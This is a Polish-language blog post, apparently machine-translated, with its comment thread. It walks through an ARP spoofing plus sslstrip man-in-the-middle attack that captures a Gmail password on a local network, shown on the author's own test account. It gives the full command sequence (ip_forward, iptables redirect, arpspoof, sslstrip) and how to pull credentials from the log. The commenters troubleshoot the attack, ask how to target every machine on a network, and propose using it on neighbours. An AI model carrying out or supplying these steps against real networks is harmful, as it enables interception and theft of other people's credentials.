Witajcie blogerzy.
Na dziś mam małą próbkę tego, jak niebezpieczne może być podłączenie się do dowolnej sieci bez zabezpieczeń, które tak wielu z nas lubi.
Na dzień dzisiejszy zamierzam użyć ArpSpoofing z Sslstrip, aby uzyskać hasło do Gmaila. Aby zapewnić lepszą kontrolę środowiska, utworzyłem konto o nazwie „testarp@gmail.com".
A ponieważ nie bardzo lubię preambuły, przejdźmy do rzeczy.
ŚRODOWISKO
Do tego testu mamy następujące dane:
1. Atakujący: To jest mój komputer stacjonarny lub stacjonarny z Debianem Wheezy. Z repozytoriów możesz zainstalować sslstrip y dsniff mieć harfowanie
2. Ofiara: Ofiarą jest tablet z Androidem, który chce widzieć swoją pocztę tylko przez przeglądarkę.
3. Medium: Środek jest mój Router Cisco DPC2425
ADRESY.
Adres atakującego: 172.26.0.2
Adres routera: 172.26.0.1
Adres ofiary: 172.26.0.8
ATAK:
Pierwszą rzeczą, jaką zrobimy w przypadku tego ataku, jest aktywacja przekazywania, aby nasz komputer mógł przesłać informacje do ofiary bez jej zauważenia. (W przeciwnym razie byłby to atak typu „odmowa usług”)
W tym celu użyjemy:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Teraz, jeśli zrobimy tail -f desdelinux widzimy informacje na żywo i bezpośrednio
Więc jak otrzymamy to, czego chcemy?
Najpierw wprowadźmy naszą pocztę na tablecie. Logując się, widzimy, że na naszej konsoli pojawiają się tysiące rzeczy.
Teraz, gdy wszystko jest już gotowe, otwórzmy nasz plik „desdelinux”z nano
nano desdelinux
za pomocą Control + W wyszukujemy coś, co nazywa się SECURE POST.
I zobaczymy coś takiego.
Wśród tej ogromnej linii, której nie widać, znajduje się adres e-mail i hasło ofiary.
Biegniemy więc w prawo, aż w końcu widzimy światło na końcu tunelu.
Przy innej okazji zobaczymy, jak możemy się trochę zabezpieczyć przed tymi atakami.
pozdrowienia
Korzystam z okazji, aby powiedzieć, że kiedy post został opublikowany, polecenia były nieprawidłowe.
W poleceniu iptables na końcu brakuje 8080, który jest w innym wierszu. A potem wszystkie polecenia arpspoof były w tej samej linii. Każde polecenie znajduje się w innym wierszu.
Mam nadzieję, że redaktor to zauważy i może to naprawić.
Pozdrowienia.
Dokonałem poprawek, o których wspominałeś, czy to w porządku?
Jeśli zamierzasz wstawić kod w preferowanym wpisie, użyj widoku HTML i sprawdź, czy artykuł jest poprawny przed wysłaniem go do oczekujących. Dziękuję Ci.
Przerażająca jest świadomość, że ci z nas, którzy nie mają wiedzy, są tak bezbronni. Bardzo dobra informacja, nawet jeśli niewiele rozumiem z tematu, zdaję sobie sprawę z wagi. Dziękuję Ci!
pozdrowienia
Ale to działa tylko wtedy, gdy atakujący i ofiara są w tej samej sieci. W każdym razie wydaje mi się, że jeśli (będąc w tej samej sieci) łączysz się za pomocą HTTPS, to się nie dzieje, ponieważ dane są szyfrowane PRZED opuszczeniem twojego komputera. Jeśli łączysz się przez HTTP (bez S) to myślę, że nawet patrząc na kabel sieciowy widzisz klucze.
To nie prawda. Włamuję się do hasła do Gmaila i jeśli zauważysz, że Gmail używa https. Więc? Chodzi o to, że chociaż https jest bezpieczny, zależy od http. Więc to nie jest takie bezpieczne.
Nie przyznawaj się tak dużo na temat https, że S nie jest dla Supermana, ale dla „bezpiecznego”
działa z https lub bez, próbowałem go z bardziej wyspecjalizowaną dystrybucją Linuksa i działa bez problemów
Możesz go precyzyjnie wykorzystać, aby udzielić lekcji tym, którzy kradną Twoje Wi-Fi. 😀
To mniej więcej tak, jak powiedzieli dawno temu na blogu Chema Alonso:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, super, co robi! / A potem mówią mojemu paranoikowi za każdym razem, gdy korzystam z VPN, kiedy idą sprawdzić konto bankowe ...). Swoją drogą, musisz zobaczyć, jak cyniczni są ludzie w komentarzach ... jeśli w końcu to kradnie ...
Teraz musimy przejść samouczek dotyczący tworzenia i oferowania własnej usługi VPN.
Historia, którą łączysz, jest bardzo interesująca, wydaje się nawet warta powieści, a to przypomina mi, kiedy korzystałem z Internetu moich sąsiadów i chociaż mówię, że znam temat, myślę, że nigdy nie mogłem zobaczyć prawdziwych wymiarów niebezpieczeństwo, które mogłem mieć trwać, na szczęście dla mnie zmienili tylko hasło na WPA2 i tak zaczęła się moja historia z ISP haha
Dlatego tytuł mówi o Sslstrip w akcji.
Działa, o ile atakujący jest w środku
Na jakiej fali pracujesz na pryzmacie? -.-
no.
Na co czekasz, aby wysłać zapytanie XD
pozdrowienia
dobra wiadomość
Ciekawe, później zrobię test edukacyjny ... Może mógłbym nawet usunąć hasło do WiFi i trochę się pobawić 😛
Czy możesz zrobić coś podobnego, aby wysłać różne strony do żądanych przez cel? Na przykład chcą otworzyć Facebooka, a ja przekierowuję ich do Google? 😛
Tak. Ale to zupełnie inna rola.
Może opublikuję to później.
bardzo dobry post, te tematy są bardzo edukacyjne, teraz musimy być w stanie przeciwdziałać temu atakowi, ponieważ niektórzy (jak ja) łączą się z sieciami publicznymi (na przykład uniwersytet), warto byłoby tego uniknąć.
Pozdrowienia!
U mnie to nie zadziałało 🙁
Coś mi tu zawodzi, poza tym, że połączenia https są szyfrowane przez certyfikat serwera (gdy masz certyfikat na swoim komputerze, twoja przeglądarka jest odpowiedzialna za szyfrowanie), a iptables przekierowujesz port 80 (http) , a nie 443, czyli https
Też tak myślałem. Chodzi o to, że chociaż https jest „bezpieczny”, niestety zależy od http. Więc sslstrip wykorzystuje to, sprawia, że przeglądarka uważa, że używa poświadczeń https, ale tak nie jest.
cholera jasna! ale przeglądarka powinna zobaczyć ostrzeżenie typu "ten certyfikat pochodzi z podejrzanej strony lub coś w tym rodzaju" ... na pewno będę musiał zrobić testy XD
Nie, absolutnie nic nie wychodzi.
W końcu mi się udało
Jestem podłączony do sieci WEP z hasłem, a mimo to hasło pokazało mi się bezpośrednio.
Zapytanie. Czy możesz wykonać tę samą procedurę, ale dla wszystkich komputerów podłączonych do sieci, zamiast mieć jedną ofiarę?
Tak, możesz. Ale nie robiłem eksperymentów. Wypróbuj sam i powiedz nam, jak sobie radzisz.
Jedyne, co mam z tym, to to, że maszyna ofiary przechodzi w tryb offline, ale sslstrip nic mi nie pokazuje: /
Musisz na chwilę wyłączyć zaporę. Lub przynajmniej włącz połączenia przychodzące.
Probe i mogłem zobaczyć tylko nazwę użytkownika i hasło do strony na Facebooku, w Gmailu nie znalazłem żadnego wyniku w dzienniku, potrzebowałem tylko wiersza arpspoof «arpspoof -i -t«. Z drugiej strony zaatakowana maszyna nie mogła otworzyć niektórych stron. Będę dalej badał, to jest bardzo interesujące. Pomoc dla tych, którzy używają Manjaro, pakiety do zainstalowania to: dsniff (tutaj jest arpspoff), twisted i python2-pyopenssl. Sslstrip można pobrać tutaj: http://www.thoughtcrime.org/software/sslstrip/
Aby go uruchomić $ python2 sslstrip.py
Pozdrowienia.
Nie wyszedł, ale linia arpspoof to: #arpspoof -i int -t ip-ofiara ip-router
spójrz, robię dokładnie to, co mówisz:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-porty 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
Problem w tym, że ofiara, czyli inny komputer, który mam tutaj w swoim pokoju, zostaje bez połączenia do tego stopnia, że muszę zrestartować router, co mogę zrobić, pomóżcie.
Inna rzecz, którą pracuję z maszyną wirtualną i kiedy wykonuję polecenie iwconfig, wlan0 nie pojawia się, ani kiedy wykonuję ifconfig, jednak jeśli mam internet na mojej maszynie wirtualnej, co z interfejsem eth0.